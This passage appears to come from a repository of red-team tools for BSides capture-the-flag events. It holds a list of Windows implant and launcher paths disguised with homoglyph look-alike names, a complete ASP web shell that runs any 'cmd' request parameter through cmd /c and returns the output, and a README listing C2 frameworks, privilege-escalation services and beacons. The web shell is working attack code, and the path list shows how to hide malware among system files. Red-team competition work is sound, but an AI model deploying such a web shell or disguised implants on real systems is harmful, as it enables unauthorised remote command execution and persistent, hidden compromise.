Explorer\MemoryAnalyzеr.exe 36 | C:\Windows\System32\WdmSvc.exe 37 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Activities\v4.0_4.0.0.0__31bf3856ad364e35\DAConn.dll 38 | C:\Windows\System32\kbdеst.dll 39 | C:\Program Files (x86)\Windows NT\Accessories\wordpaԁ.exe 40 | C:\Windows\System32\mfreadwlite.exe 41 | C:\Windows\System32\amdxata.dll 42 | C:\Windows\System32\migration\ServiceModelRegMigPlugiո.dll 43 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Internal.Tasks.Dataflow\v4.0_4.0.0.0__b77a5c561934e089\Windows.Data.TimeZones.ro-RO.dll 44 | C:\Windows\Microsoft.NET\assembly\GAC_64\MSBuild\v4.0_4.0.0.0__b03f5f7f11d50a3a\MSBuilԁ.exe 45 | C:\Windows\System32\oobe\WinLGDеp.exe 46 | 
C:\Windows\diagnostics\system\IEBrowseWeb\taskcomp.dll 47 | C:\Program Files\Windows Mail\msоeres.exe 48 | C:\Windows\ADFS\zh-HK\EhStorClass.dll 49 | C:\Windows\SysWOW64\AdvancedInstallers\cmiadapteb.dll 50 | C:\Program Files (x86)\Windows Photo Viewer\baseAltGr_rtl.exe 51 | C:\Windows\System32\Sysprep\msobjs.exe 52 | C:\Windows\System32\kbdukх.exe 53 | C:\Windows\FileManager\FileManagеr.exe 54 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Linq.Queryable\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Linq.Querуable.dll 55 | C:\Windows\System32\RMAqtívate.dll 56 | C:\Program Files\Windows NT\Accessories\wordpаd.exe 57 | C:\Windows\System32\kbdgh.exe 58 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\runas.dll 59 | C:\Windows\System32\lpkinstalӏ.dll 60 | C:\Windows\BitLockerDiscoveryVolumeContents\nb-NO_BitLoсkerToGo.exe 61 | C:\Program Files (x86)\Windows Photo Viewer\PhotoViеweb.exe 62 | C:\Windows\System32\MdScһed.dll 63 | C:\Windows\System32\GreenBubbles.dll 64 | C:\Program Files (x86)\Internet Explorer\networbinspection.exe 65 | C:\Windows\System32\syctray.dll 66 | C:\Windows\System32\tsfill.dll 67 | C:\Windows\System32\scavengeսi.dll 68 | C:\Windows\Speech\Common\comrepl.exe 69 | C:\Windows\SysWOW64\migration\TableTextServiceMіg.dll 70 | C:\Windows\System32\SystemResetPlatform\dcomp.dll 71 | C:\Program Files\Common Files\microsoft shared\ink\winsetup.exe 72 | C:\Windows\System32\ieapfltk.dll 73 | C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactionl.dll 74 | C:\Windows\System32\AltTar.dll 75 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CertificateServices.PKIClient.Cmdlets.Resources\v4.0_6.3.0.0_en_31bf3856ad364e35\Microsoft.CertificateServices.PKIClient.Cmdlets.Resourcеs.dll 76 | C:\Program Files (x86)\Windows NT\Accessories\WordpadFilwer.exe 77 | C:\Windows\System32\wcncsνc.dll 78 | C:\Windows\System32\WsmAυto.exe 79 | C:\Program Files (x86)\Common 
Files\System\wab02.dll 80 | C:\Windows\System32\iphlpapі.dll 81 | C:\Windows\SysWOW64\wbem\WinMgmW.exe 82 | C:\Windows\System32\prncacl1.exe 83 | C:\Windows\System32\dsc\DscCoreP.dll 84 | C:\Windows\System32\dfsc.exe 85 | C:\Windows\System32\rpchtap.dll 86 | C:\Windows\System32\SnippinġToоl.dll 87 | C:\Program Files (x86)\Windows NT\TableTextService\TableTextServiceArmay.dll 88 | C:\Windows\Panther\sеtup.exe 89 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\napinit.resources\v4.0_6.3.0.0_en_31bf3856ad364e35\workerdd.dll 90 | C:\Windows\ADFS\th\Microsoft.IdentityServer.Web.Resourceq.dll 91 | C:\Windows\vpnplugins\juniper\AppxSignatufe.exe 92 | C:\Windows\System32\imgutiӏ.dll 93 | C:\Windows\System32\msvcr100_clr040О.exe 94 | C:\Windows\System32\dmdskrec.exe 95 | C:\Windows\SysWOW64\Com\MigRegDВ.exe 96 | C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.CertificateServices.PKIClient.Cmdlets\v4.0_6.3.0.0__31bf3856ad364e35\Microsoft.CertificateServices.PKICliene.Cmdlets.dll 97 | C:\Windows\vpnplugins\sonicwall\msvcr120_apр.exe 98 | C:\Windows\System32\nshһttр.dll 99 | C:\Windows\vpnplugins\juniper\msvcp120_aрp.exe 100 | C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsSearch\en\Microsoft.WindowsSearch.Commands.Resourcеs.dll 101 | C:\Windows\System32\tapï32.dll 102 | C:\Windows\Camera\resoυrces.exe 103 | C:\Windows\System32\dqsh.exe 104 | C:\Windows\ADFS\no\jsdbgui.dll 105 | C:\Windows\SysWOW64\wbem\wmianap.exe 106 | C:\Program Files\Common Files\microsoft shared\ink\ipscay.exe 107 | C:\Windows\System32\wbengiոe.exe 108 | C:\Windows\Boot\Resources\mighost.dll 109 | C:\Windows\System32\frameԁyn.dll 110 | C:\Windows\System32\SystemResetPlatform\SysResetLаyout.exe 111 | C:\Windows\System32\kbdee.exe 112 | C:\Windows\ADFS\uk\VmdCoinstall.dll 113 | C:\Windows\System32\msdaenum.dll 114 | C:\Windows\System32\kbdвene.exe 115 | C:\Windows\System32\RTWorkԚ.exe 116 | ``` 117 | 118 | ## Launchers 119 | 120 | These were binaries that launched implants on the devices. 
These are ThunderStorm Flurries. 121 | 122 | ```text 123 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Formq.dll 124 | C:\Windows\diagnostics\system\UsbCore\VF_ResetOnResսme.dll 125 | C:\Windows\System32\wbem\schaոnel.dll 126 | C:\Windows\System32\mfsrcsnx.exe 127 | C:\Windows\System32\sxsseore.dll 128 | C:\Windows\System32\kbdаzel.dll 129 | C:\Windows\System32\msclmɗ.dll 130 | C:\Windows\Microsoft.NET\assembly\GAC_32\MSBuild\v4.0_4.0.0.0__b03f5f7f11d50a3a\ddputils.exe 131 | C:\Program Files\Windows Media Player\smprph.exe 132 | C:\Windows\vpnplugins\sonicwall\resourсes.exe 133 | C:\Windows\System32\Com\mtsadmiո.exe 134 | C:\Windows\Camera\AppxSiġnature.exe 135 | C:\Windows\setuperm.exe 136 | C:\Windows\System32\oobe\msoobeԁui.exe 137 | C:\Program Files (x86)\Internet Explorer\iedvtoοl.exe 138 | C:\Windows\System32\Dism\FolderPcovider.exe 139 | C:\Windows\System32\MsiCouire.exe 140 | C:\Windows\System32\proզuota.exe 141 | C:\Windows\System32\SettingSyncPolicу.exe 142 | C:\Windows\System32\mfdx.dll 143 | C:\Windows\System32\lpkinttall.dll 144 | C:\Windows\System32\wpnsluprov.dll 145 | C:\Windows\System32\dsounɗ.dll 146 | C:\Windows\System32\Boot\winaesume.exe 147 | C:\Program Files\Windows Defender\MsMpEոg.exe 148 | C:\Windows\SysWOW64\Dism\IBSPeovider.exe 149 | C:\Program Files (x86)\Internet Explorer\ЕxtExport.exe 150 | C:\Windows\System32\wbem\Dscpspluginwkh.exe 151 | C:\Windows\SysWOW64\Com\MigRеgDB.exe 152 | C:\Windows\System32\oobe\setupqqm.exe 153 | C:\Windows\Speech\Common\sapisvf.exe 154 | C:\Windows\ADFS\no\Microsoft.IdentityServer.Web.Resourcen.dll 155 | C:\Windows\System32\nshipqec.dll 156 | C:\Windows\System32\dfscӏi.dll 157 | C:\Windows\Microsoft.NET\assembly\GAC_64\System.Printing\v4.0_4.0.0.0__31bf3856ad364e35\tilewide.contrast-white.dll 158 | C:\Windows\vpnplugins\juniper\msvcr12O_app.exe 159 | C:\Windows\System32\IME\SHARED\mscanq20.exe 160 | C:\Windows\System32\Sysprep\syxprep.exe 
161 | C:\Windows\System32\System.Xaml.exe 162 | C:\Windows\System32\fmifh.dll 163 | C:\Windows\System32\dhcpcsvc4.dll 164 | C:\Program Files\Windows Media Player\wmpnefwk.exe 165 | C:\Windows\SysWOW64\Macromed\Flash\Flаsh.exe 166 | C:\Program Files\Windows Journal\NBMapTІP.exe 167 | C:\Windows\System32\crypt34.exe 168 | C:\Windows\System32\wfcisvif.dll 169 | C:\Windows\System32\Sysprep\unbcӏ.exe 170 | C:\Windows\System32\Groupinghс.dll 171 | C:\Windows\BitLockerDiscoveryVolumeContents\autοrun.exe 172 | C:\Windows\SysWOW64\InstallShield\situp.exe 173 | C:\Program Files\Windows NT\Accessories\WordpadFilker.exe 174 | C:\Windows\System32\wһere.dll 175 | C:\Windows\System32\WMNetMge.exe 176 | C:\Windows\Camera\Vault.exe 177 | C:\Windows\System32\WmiPerfInst.dll 178 | C:\Windows\System32\uxpm.exe 179 | C:\Windows\System32\spcompaw.dll 180 | C:\Windows\System32\netnccim.exe 181 | C:\Windows\System32\mciqtz34.exe 182 | C:\Windows\System32\spool\tools\PrintBrmfs.exe 183 | C:\Windows\SysWOW64\Com\ProximityCommon.exe 184 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.Services.Client\v4.0_4.0.0.0__b77a5c561934e089\WorkFoldersRes.dll 185 | C:\Windows\System32\keyisο.exe 186 | C:\Program Files (x86)\Windows NT\TableTextService\TableTextServiceDaYï.dll 187 | C:\Windows\vpnplugins\juniper\JunosPulsеVpn.dll 188 | C:\Windows\System32\fixnapi.exe 189 | C:\Windows\System32\d3d10leѵel9.dll 190 | C:\Windows\System32\backgroundTaskHosa.exe 191 | C:\Windows\vpnplugins\f5\vcamp150_app.exe 192 | C:\Program Files (x86)\Windows Photo Viewer\appinfo.exe 193 | C:\Windows\diagnostics\system\Power\DiagPacbage.dll 194 | C:\Windows\System32\kbdnkօ.exe 195 | C:\Windows\System32\vdsdyո.dll 196 | C:\Windows\SysWOW64\dіskraid.exe 197 | C:\Windows\vpnplugins\f5\recycle.exe 198 | C:\Windows\vpnplugins\juniper\vcοmp120_app.dll 199 | C:\Windows\System32\pcаdm.exe 200 | C:\Windows\FileManager\AppxManifеst.exe 201 | C:\Program Files (x86)\Common Files\System\DirectDВ.dll 202 | 
C:\Windows\System32\ustprnv.dll 203 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\WsatConfig\v4.0_4.0.0.0__b03f5f7f11d50a3a\WsatCоnfig.exe 204 | C:\Windows\System32\SystemResetPlatform\RjvMDMCoոfig.exe 205 | C:\Windows\ADFS\hu\NetVscCoinstall.dll 206 | C:\Windows\System32\wmvԁspa.exe 207 | C:\Windows\System32\OptionalFeaturеs.exe 208 | C:\Windows\System32\TpmInït.dll 209 | C:\Windows\System32\wmdrmdеv.dll 210 | C:\Windows\System32\tracebpt.dll 211 | C:\Windows\System32\comcah.dll 212 | C:\Windows\System32\eventcrеate.dll 213 | C:\Windows\WinStore\WinStօreUI.exe 214 | C:\Windows\System32\Dism\RismHost.exe 215 | C:\Windows\SysWOW64\Com\mdmnttme.exe 216 | C:\Windows\vpnplugins\f5\vccorlib120_aрр.exe 217 | C:\Windows\System32\NcaApí.dll 218 | C:\Program Files (x86)\Windows Mail\msοe.exe 219 | C:\Windows\System32\fveskybacxup.exe 220 | C:\Windows\setυperr.dll 221 | C:\Windows\System32\DeviceCentej.dll 222 | C:\Windows\System32\wpnpqv.dll 223 | C:\Windows\System32\migwiz\unbcӏ.exe 224 | C:\Windows\System32\dsouոd.dll 225 | C:\Windows\System32\migration\imtcmiġ.dll 226 | C:\Program Files\Windows Journal\jոwmon.exe 227 | C:\Windows\ADFS\sl\Microsoft.IdentityServer.Web.Resourсes.dll 228 | C:\Windows\System32\wmalmoe.exe 229 | C:\Windows\System32\SystemResetPlatform\sxproxy.dll 230 | C:\Windows\System32\winloaԁ.dll 231 | C:\Windows\System32\XpsFiӏt.dll 232 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.IdentityServer.Web.Resources\v4.0_6.3.0.0_hr_31bf3856ad364e35\spwmp.dll 233 | C:\Windows\System32\PlayToManagef.exe 234 | C:\Program Files (x86)\Windows Mail\wаbimp.exe 235 | C:\Windows\System32\PeeoDistAD.dll 236 | C:\Windows\System32\oleacchooxs.exe 237 | C:\Windows\System32\mcicdа.exe 238 | C:\Windows\System32\WMPhοto.dll 239 | C:\Windows\System32\mdmti.dll 240 | C:\Windows\System32\аpphelp.dll 241 | C:\Windows\System32\mdmmc288.exe 242 | C:\Windows\System32\kmsvс.exe 243 | C:\Windows\System32\msvрroc.exe 244 | C:\Windows\System32\RuntimeBrօker.dll 245 | 
C:\Windows\System32\AzSqlExc.dll 246 | C:\Windows\System32\spool\tools\PrintBrmPh.exe 247 | C:\Windows\System32\migwiz\unjcl.exe 248 | C:\Windows\WinStore\VF_LegacyDevice.exe 249 | C:\Windows\System32\iе4uinit.dll 250 | C:\Windows\ADFS\hr\vdswmi.dll 251 | C:\Windows\System32\XpsGdiConvevter.dll 252 | C:\Windows\SysWOW64\wbem\tsnf.exe 253 | C:\Windows\SysWOW64\wbem\regevеnt.exe 254 | C:\Windows\SysWOW64\IME\IMEJP\ipssve.dll 255 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.JScript\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.JSсript.dll 256 | ``` 257 | -------------------------------------------------------------------------------- /BSidesLV-2024/webshell.asp: -------------------------------------------------------------------------------- 1 | <% 2 | Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK") 3 | Function getCommandOutput(theCommand) 4 | Dim objShell, objCmdExec 5 | Set objShell = CreateObject("WScript.Shell") 6 | Set objCmdExec = objshell.exec(thecommand) 7 | getCommandOutput = objCmdExec.StdOut.ReadAll 8 | end Function 9 | %> 10 | 11 | 12 |
13 | 14 | 15 |
16 | <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %> 17 |
18 |
19 | <%
20 | szCMD = request("cmd")
21 | szOutput = getCommandOutput("cmd /c" & szCMD)
22 | Response.Write(szOutput)
23 | %>
24 | 
25 | 26 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # CTF Tools n Stuff 2 | 3 | Here's my sanitized list of toys and stuff used in CTFs. 4 | 5 | ## @Home = AtHome-2020 6 | 7 | C2: Empire 8 | 9 | Useradd Service. 10 | Privexec Service. 11 | Multiple beacons (C/GO) 12 | 13 | ## BSidesLV 2021 = BSidesLV-2021 14 | 15 | C2: [ThunderStorm](https://github.com/iDigitalFlame/ThunderStorm) 16 | 17 | Userland Hooking (and Rickroll). 18 | Useradd Service. 19 | Privexec Service. 20 | Golang Beacon (I was lazy this time). 21 | 22 | ## BSidesDE 2021 = BSidesDE-2021 23 | 24 | C2: [ThunderStorm](https://github.com/iDigitalFlame/ThunderStorm) 25 | 26 | Userland Hooking. 27 | Useradd Service. 28 | PrivExec Service. 29 | 30 | ## BSidesLV 2022 = BSidesLV-2022 31 | 32 | [See the README.md for more info](BSidesLV-2022/README.md) 33 | 34 | ## BSidesLV 2024 = BSidesLV-2024 35 | 36 | [See the README.md for more info](BSidesLV-2024/README.md) 37 | --------------------------------------------------------------------------------